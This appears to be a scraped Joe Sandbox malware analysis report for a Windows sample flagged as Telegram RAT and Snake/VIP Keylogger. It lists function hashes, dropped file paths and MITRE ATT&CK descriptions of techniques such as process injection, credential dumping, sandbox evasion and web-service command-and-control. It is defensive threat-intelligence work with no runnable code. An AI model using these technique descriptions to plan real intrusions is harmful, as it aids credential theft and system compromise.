Opcode ID: d57b63af25c648efefa9737299b9433b0ae54b773d6ac10d2a53e13dc1677d3f
Instruction ID: b66d5858083e3924ae68c4fce3758bf17185351f60606e2f85a8c1f1570a4302
Opcode Fuzzy Hash: d57b63af25c648efefa9737299b9433b0ae54b773d6ac10d2a53e13dc1677d3f
Instruction Fuzzy Hash: 76118079D00209DFDB01EFA9D8449AEFBB1FB4A300F108166E920B3354D7345A45DFA1

Function 0118ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9854997884a268ebe8923ce785966d3171d1c755b073ca9ba6594bdeb7e13397
Instruction ID: 9f769add8807824e6cc6a25401b2166e54bddb2a45cd21ba33eb09593d3f0d72
Opcode Fuzzy Hash: 9854997884a268ebe8923ce785966d3171d1c755b073ca9ba6594bdeb7e13397
Instruction Fuzzy Hash: 4BF09C317406104B971D7A2EA85462A77DEEFC8955355847BE509CB361EF21CC03CB90

Function 01189D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f081434df03475f38127f3201b2664dca0425490e2a78be81b31d1db5afa3050
Instruction ID: 8da637f0d0428066a89ed5fa9859db184681050afbc15f6ef02c9aceef865b3c
Opcode Fuzzy Hash: f081434df03475f38127f3201b2664dca0425490e2a78be81b31d1db5afa3050
Instruction Fuzzy Hash: 66F0A435300209AFDB0C2EE99850A7EBBCBEBC8264B148569BA4AC7350DF71CC1197A0

Function 01189C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c74a7afc554df641234df293417f2ce89b249e3da73945aec10ab06babe25ae
Instruction ID: 7f1c5f114611f24e2f73f79d23712c9dcd1812164a96f31222a62bd46f45b5e7
Opcode Fuzzy Hash: 8c74a7afc554df641234df293417f2ce89b249e3da73945aec10ab06babe25ae
Instruction Fuzzy Hash: 6CF096319041989FCB069F699C446F9BFB1EFCA220F05C5A6E558C7151D3314955CB51

Function 0118F438 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33dbaec432343a5445ceccd54abe7c2ad1feaae41d0c5d0e0e0dbfec0df6fa14
Instruction ID: 90284d53ebdf35271883fc07ed7fb71401e372ca20fc6011932b9e2ba628d147
Opcode Fuzzy Hash: 33dbaec432343a5445ceccd54abe7c2ad1feaae41d0c5d0e0e0dbfec0df6fa14
Instruction Fuzzy Hash: 93F03A70A10216CFCB88EFBCC40455E77F4AF0C610B1244BAD409DB321EB31D9118B91

Function 011828A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e3fcb486982c9a142be75fe0ad3f776469504e5705a6f8c3096927d51d3ca7
Instruction ID: e81731c78ba548797429cb34591bb091df89c2603e6cc4decfcdf444c947ec3f
Opcode Fuzzy Hash: 53e3fcb486982c9a142be75fe0ad3f776469504e5705a6f8c3096927d51d3ca7
Instruction Fuzzy Hash: 05E02672EA436ACBCB02EBF09C100EEBB34EDD7121B08459BD46237190EB342259C3A1

Function 01186739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e89eebb36fc550a8333cbb2d7ed068684283643984cfd41b3cc5a2d3f49444
Instruction ID: 849e0f0b799044d2d4ba814aa3f0f1786af13be79636eebcacd757d8243d7254
Opcode Fuzzy Hash: d9e89eebb36fc550a8333cbb2d7ed068684283643984cfd41b3cc5a2d3f49444
Instruction Fuzzy Hash: 78E0C2310093C54FDB03B778B8968E87F36BE83000B5C95F1D4808E69BDE640C8ACB62

Function 011828B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b155b03cb3f9d17dc55e1f182cd62f86c08e0ea88013e12b2bc0c43a885efc9f
Instruction ID: cadcff72579d7f552519d570ba00b008b5b76ef7f05123bd900fe4f392f2191d
Opcode Fuzzy Hash: b155b03cb3f9d17dc55e1f182cd62f86c08e0ea88013e12b2bc0c43a885efc9f
Instruction Fuzzy Hash: CED05E32E2022B97CB00EBA5EC048EFF738EED6661B908626D52537140FB713659C7E1

Function 01188EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 680a6a43d7beca4274570d91f024b042aa81454f35c6e0475fef24a778db9827
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: C2C0803310C1242A923D204E7C40DA3774DC3C13B4A514137FB1CD3200DC425C8001F6

Function 0118CC97 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc85f941273e88f647e5ba99ca7f5dee70f5fb74ddee627911ede6756ef2c1c
Instruction ID: dba3714e7216e394a301dbd061496f0832c6be9a8ceb7e7106b508879d3e4f71
Opcode Fuzzy Hash: cbc85f941273e88f647e5ba99ca7f5dee70f5fb74ddee627911ede6756ef2c1c
Instruction Fuzzy Hash: 85E09275E0410CCFDF14DF65EA456DCBBB2AB88204F1044A6D509A7211D7315E528F15

Function 0118AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e5377dcdb1d0544d45d5e7024b7bcf10ecfa593dd37605b7ee00e372656460
Instruction ID: e97274e7653687ae5fb1f6b61e0d356e2c97a1c3349ceda442543345474c01d3
Opcode Fuzzy Hash: 15e5377dcdb1d0544d45d5e7024b7bcf10ecfa593dd37605b7ee00e372656460
Instruction Fuzzy Hash: 79D0677BB40008EFCF049F98E840ADDF776FB98221B448516E915A7264C6319965DB50

Function 01186748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3889983690.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1180000_qggKEJlcsFa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf28befab74ab9a77656443645cd976b0805dea97cd3cbe9f79ce72f660fede
Instruction ID: 812877f8d7aae4f4d70808de42b03d3ee87b6614f2e2a37489afb583af08795b
Opcode Fuzzy Hash: bcf28befab74ab9a77656443645cd976b0805dea97cd3cbe9f79ce72f660fede
Instruction Fuzzy Hash: 84C0803144134C4BDD01F7B9FC855D9735EBEC45047409630A4050A75EFF746D854BD1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EUYIlr7uUX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EUYIlr7uUX.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qggKEJlcsFa.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhpaxbo5.e4a.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbibglpb.523.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4w1kc0h.slr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x03er4si.pg3.psm1

C:\Users\user\AppData\Local\Temp\tmp16F6.tmp

C:\Users\user\AppData\Local\Temp\tmp2369.tmp

Windows Analysis Report
EUYIlr7uUX.exe

Function 06F36954 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre